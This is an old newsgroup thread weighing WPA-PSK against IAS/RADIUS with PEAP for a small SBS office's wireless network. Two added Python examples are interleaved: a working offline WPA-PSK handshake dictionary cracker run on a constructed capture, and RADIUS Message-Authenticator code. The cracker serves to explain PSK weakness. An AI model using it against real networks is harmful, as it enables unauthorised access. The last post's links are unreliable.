Security, Access Points and Radius in A SBS network - Is IAS Overkill?

Post by Aaro » Mon, 02 Feb 2004 08:21:39


Hello all.

I have a SMALL SBS2003 Domain with approx. 20 users internally and an
additional 5-6 Laptop users (and possibly some wireless PDA/iPaq users
eventually).


Now that I have a growing number of users with Laptops with wireless
capabilities, they are wanting the same convenience they have at home (in terms
of being able to roam their house wirelessly). Apparently now they feel they
MUST have the same ability at the office. Actually there really is a BIG
need to have everyone connected in the conference room without having CAT5
tangled all over the place.

So I am now at the point of deciding which AP to buy, and what is the best
way to implement SECURITY. I am at the moment leaning toward WPA-PSK to
implement security (at least initially), and to that end have selected a
number of APs to consider for purchase.

In addition to those APs that support WPA-PSK, I am also looking at units
that support 802.1X, so that (at some point in the future) I _could_
implement IAS and use RADIUS authentication. My primary question: Would IAS
be overkill for a _SMALL_ SBS network, or would WPA with pre-shared keys be
sufficient???

The APs I am currently considering are:

1) Proxim Orinoco AP-600b/g ($350 at CDW) (This is my favored one, assuming
that TPTB will cough up the cash ;-)
2) D-Link DWL-2100AP $229
3) USR Turbo access point (5450) $209
4) D-Link DWL-200AP $99 (DOESN'T support RADIUS auth., but does support
WPA-PSK and is considerably less expensive)

Note: I like D-Link products, and have had good luck with them. At home I use
the DI-614+ router and a DWL-650+ card in my laptop (both are only 802.11b,
but they suit my needs). These units supported 256-bit WEP while most
others only had 128, and they now also offer WPA (but I will have to buy a
supplicant from Funk for my W2K Pro laptop). Anyway, they have worked quite
well and kept my network as secure as WEP would allow (I rotated keys
frequently). Prior to wireless I had (and still have) a DI-704 router. This
is also a great little unit, and it also lets me attach an external modem to
it so that if my DSL goes down, I simply log into the unit and switch over to
dial-up. All my D-Link stuff has worked well and been relatively
inexpensive - lotsa "bang for the buck"!

Anyway, any comments, opinions and recommendations welcome.

Aaron
 
 
 
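The "is WPA-PSK sufficient" question above comes down to one fact: the PSK is derived from the passphrase and SSID alone, and every other input to the pairwise key is sent in the clear during the 4-way handshake, so anyone who captures one handshake can test passphrase guesses offline. The example below is added here and is not code from the thread or from any vendor; it implements the 802.11i passphrase-to-PSK mapping, the PTK/KCK derivation and the WPA2 message-2 MIC, then builds a constructed handshake "capture" (the SSID, MAC addresses and wordlist are made up) and runs a dictionary attack against it. It reproduces the IEEE 802.11i Annex test vector for passphrase "password" / SSID "IEEE".

```python
"""
Added example (not code from the thread): why a WPA-PSK network is exactly as
strong as its passphrase.  The handshake "capture" is constructed here, not a
real sniffer trace; SSID, MACs and wordlist are made-up sample data.
"""
import hashlib
import hmac
import os
import struct

MIC_OFFSET = 81    # Key MIC field offset inside an EAPOL-Key frame
NONCE_OFFSET = 17  # Key Nonce field offset inside an EAPOL-Key frame


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """802.11i passphrase-to-PSK mapping: PBKDF2-HMAC-SHA1, salt = SSID,
    4096 iterations, 256-bit output.  Nothing here is secret except the
    passphrase, so anyone who knows the SSID can recompute candidate PSKs."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1 blocks over label||0||data||counter, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    The first 16 bytes are the KCK that keys the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2) Key MIC: HMAC-SHA1 over the whole
    EAPOL-Key frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, key_data: bytes = b"") -> bytes:
    """Minimal EAPOL-Key message 2 (station -> AP) with a zeroed MIC field."""
    key_info = 0x010A  # descriptor version 2 | Pairwise | MIC present
    body = (struct.pack("!BHHQ", 2, key_info, 0, 1)   # RSN descriptor, key info, key len, replay ctr
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, IV, RSC, reserved
            + bytes(16)                                  # MIC placeholder
            + struct.pack("!H", len(key_data)) + key_data)
    return struct.pack("!BBH", 1, 3, len(body)) + body  # 802.1X v1, type EAPOL-Key


def simulate_capture(passphrase: str, ssid: str, aa: bytes, spa: bytes) -> dict:
    """Play both AP and station to produce what a sniffer sees: the ANonce
    from message 1 and the SNonce + MIC in message 2.  Constructed data."""
    anonce, snonce = os.urandom(32), os.urandom(32)
    kck = derive_ptk(derive_psk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame = build_msg2(snonce)
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "eapol": frame}


def crack(capture: dict, wordlist) -> tuple:
    """Offline dictionary attack: recompute the message-2 MIC for each candidate
    passphrase.  Returns (recovered passphrase or None, candidates tried)."""
    frame = capture["eapol"]
    snonce = frame[NONCE_OFFSET:NONCE_OFFSET + 32]
    claimed = frame[MIC_OFFSET:MIC_OFFSET + 16]
    tried = 0
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:   # cannot be a valid WPA passphrase
            continue
        tried += 1
        kck = derive_ptk(derive_psk(cand, capture["ssid"]), capture["aa"],
                         capture["spa"], capture["anonce"], snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), claimed):
            return cand, tried
    return None, tried


if __name__ == "__main__":
    cap = simulate_capture("letmein123", "SBS-Conf",
                           bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"))
    print(crack(cap, ["password", "conference", "letmein123", "Tr0ub4dor&3"]))
```

The 4096-iteration PBKDF2 is what makes each guess cost something, but it is a fixed cost that an attacker pays offline with no further contact with the AP; the only defence on a PSK network is passphrase entropy, and changing the key means re-keying every laptop and PDA by hand, which is the operational gap 802.1X with per-user credentials closes.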

Post by James McIl » Wed, 04 Feb 2004 07:53:23

Hi Aaron --

I think if you deployed IAS with secure password authentication using PEAP
(Protected Extensible Authentication Protocol) you would be really happy
with the strong security it provides. The compatible clients are XP SP1,
Pocket PC 2002, and W2K with the 802.1X pack installed.

PEAP is encapsulated by 802.1X, so you would need an 802.1X-compatible AP,
although I can't recommend a specific AP for you.

When you configure PEAP on the IAS server to use MS-CHAP v2 (PEAP-MS-CHAP
v2), you wind up with secure password authentication. Here are some of the
advantages:

-- Mutual authentication. The IAS server authenticates itself to the client
using a Server Certificate. The user provides user name and password. You
can deploy Certificate Services on your network (Included with Windows
Server 2003) to enroll a Server Certificate to your IAS server, or you can
purchase a server cert from a third party company like Verisign or Thawte.

-- PEAP enables fast reconnect, so if your company grows and you need to
add APs, when users wander from one AP to another, they are automatically
reauthenticated and are not prompted for credentials.

-- PEAP creates a secure Transport Layer Security (TLS) tunnel before
transmitting any information, so nothing is sent in the clear.

-- PEAP uses the AP as a pass-through, so the AP only forwards messages
between client and server. (So if someone hacks your AP they can't grab any
info)

Those are just a few of the security benefits. If you're interested, you
should check out two whitepapers at the IAS site:

http://www.microsoft.com/windowsserver2003/technologies/ias/default.mspx

1. The Advantages of Protected Extensible Authentication Protocol (PEAP)
2. Enterprise Deployment of Secure 802.11 Networks Using Microsoft Windows
3. Obtaining and Installing a VeriSign WLAN Server Certificate for PEAP-MS-
CHAP v2 Wireless Authentication

Hope that helps! :-)

--
James McIllece, Microsoft

Please do not send email directly to this alias. This is my online account
name for newsgroup participation only.

This posting is provided "AS IS" with no warranties, and confers no rights.

 
 
 
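The "AP as a pass-through" point in the reply above has two halves: the EAP conversation inside PEAP's TLS tunnel runs end-to-end between the supplicant and the IAS server, while the RADIUS leg between the AP and IAS is protected only by the shared secret configured on both. The example below is added here and is not code from the thread, from IAS or from any AP vendor; it builds the Access-Request an 802.1X AP sends (the supplicant's EAP Response/Identity wrapped in EAP-Message attributes) and the Message-Authenticator check that RFC 3579 requires on every RADIUS packet carrying EAP, as the server would apply it. The shared secret, NAS address and user name are constructed.

```python
"""
Added example (not from the thread): the RADIUS Access-Request an 802.1X AP
sends to the RADIUS server while acting as an EAP pass-through, and the
Message-Authenticator check (RFC 3579) the server applies to it.  The shared
secret, NAS IP address and user name are made-up sample values.
"""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_NAS_IP_ADDRESS = 4
ATTR_EAP_MESSAGE = 79
ATTR_MESSAGE_AUTHENTICATOR = 80
EAP_RESPONSE = 2
EAP_TYPE_IDENTITY = 1


def attr(kind: int, value: bytes) -> bytes:
    """RADIUS attribute: Type(1) Length(1) Value; Length includes the 2-byte header."""
    if len(value) > 253:
        raise ValueError("attribute value too long for one AVP")
    return struct.pack("!BB", kind, len(value) + 2) + value


def eap_identity_response(ident: int, identity: str) -> bytes:
    """EAP Response/Identity: Code(1) Identifier(1) Length(2) Type(1) Type-Data."""
    body = struct.pack("!B", EAP_TYPE_IDENTITY) + identity.encode()
    return struct.pack("!BBH", EAP_RESPONSE, ident, 4 + len(body)) + body


def build_access_request(secret: bytes, identity: str, nas_ip: str, pkt_id: int = 0) -> bytes:
    """What the AP (the NAS) sends: the supplicant's EAP message relayed inside
    RADIUS and authenticated to the server with the AP<->RADIUS shared secret."""
    authenticator = os.urandom(16)  # Request Authenticator, fresh per request
    leading = (attr(ATTR_USER_NAME, identity.encode())
               + attr(ATTR_NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))))
    ma_offset = 20 + len(leading) + 2  # where the 16-byte MAC value will sit
    attrs = (leading
             + attr(ATTR_MESSAGE_AUTHENTICATOR, bytes(16))  # zeroed while computing the MAC
             + attr(ATTR_EAP_MESSAGE, eap_identity_response(1, identity)))
    header = struct.pack("!BBH", ACCESS_REQUEST, pkt_id, 20 + len(attrs)) + authenticator
    packet = header + attrs
    mac = hmac.new(secret, packet, hashlib.md5).digest()  # HMAC-MD5 over the whole packet
    return packet[:ma_offset] + mac + packet[ma_offset + 16:]


def parse_attrs(packet: bytes) -> list:
    """Return [(type, value_offset, value)] for the attributes after the 20-byte header."""
    out, pos = [], 20
    while pos < len(packet):
        if pos + 2 > len(packet):
            raise ValueError("truncated attribute header")
        kind, length = struct.unpack("!BB", packet[pos:pos + 2])
        if length < 2 or pos + length > len(packet):
            raise ValueError("malformed attribute length")
        out.append((kind, pos + 2, packet[pos + 2:pos + length]))
        pos += length
    return out


def verify_access_request(secret: bytes, packet: bytes):
    """Server-side check.  Returns the reassembled EAP payload when the packet
    is well formed and its Message-Authenticator verifies, otherwise None."""
    if len(packet) < 20 or packet[0] != ACCESS_REQUEST:
        return None
    if struct.unpack("!H", packet[2:4])[0] != len(packet):
        return None
    try:
        attrs = parse_attrs(packet)
    except ValueError:
        return None
    mas = [(off, val) for kind, off, val in attrs if kind == ATTR_MESSAGE_AUTHENTICATOR]
    if len(mas) != 1 or len(mas[0][1]) != 16:
        return None  # RFC 3579: exactly one is required when EAP-Message is present
    off, claimed = mas[0]
    zeroed = packet[:off] + bytes(16) + packet[off + 16:]
    expected = hmac.new(secret, zeroed, hashlib.md5).digest()
    if not hmac.compare_digest(claimed, expected):
        return None
    # One EAP packet may be split across several EAP-Message AVPs at 253 bytes.
    return b"".join(val for kind, _, val in attrs if kind == ATTR_EAP_MESSAGE)


if __name__ == "__main__":
    secret = b"ap-to-ias-shared-secret"
    req = build_access_request(secret, "aaron", "192.168.16.50")
    print(verify_access_request(secret, req))
    print(verify_access_request(b"wrong-secret", req))
```

The check shows which leg each secret protects: a wrong shared secret or a flipped byte anywhere in the packet makes the server drop it, but the secret never protects the user's credentials, which only ever travel inside the PEAP TLS tunnel the AP cannot open. Since this leg is HMAC-MD5 keyed by a static secret, keep it on the wired side, give each AP its own long random secret, and do not let the AP-to-RADIUS traffic cross the wireless segment.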

Post by Wildcat » Sun, 08 Feb 2004 03:21:43

Hi,

Personally, I'd look at the Colubris CN1050 (under $800)
or the SonicWall TZW (~$500). Using these access points
that have REAL integrated firewalls, you can achieve a
high level of security and still provide flexible
authentication and access controls.

Search Google, and you'll find that they are both very
highly rated. I used the Colubris 1050 at a CWSP course,
and it was beautiful (full featured and easy to set up).
I manage many SonicWalls, and they are a snap. You can't
go wrong. Hope this helps.

http://www.yqcomputer.com/

This issue of PC Mag had many reviews. Check it out.
http://www.yqcomputer.com/ ,4149,1277246,00.asp
http://www.yqcomputer.com/ ,4149,1277272,00.asp
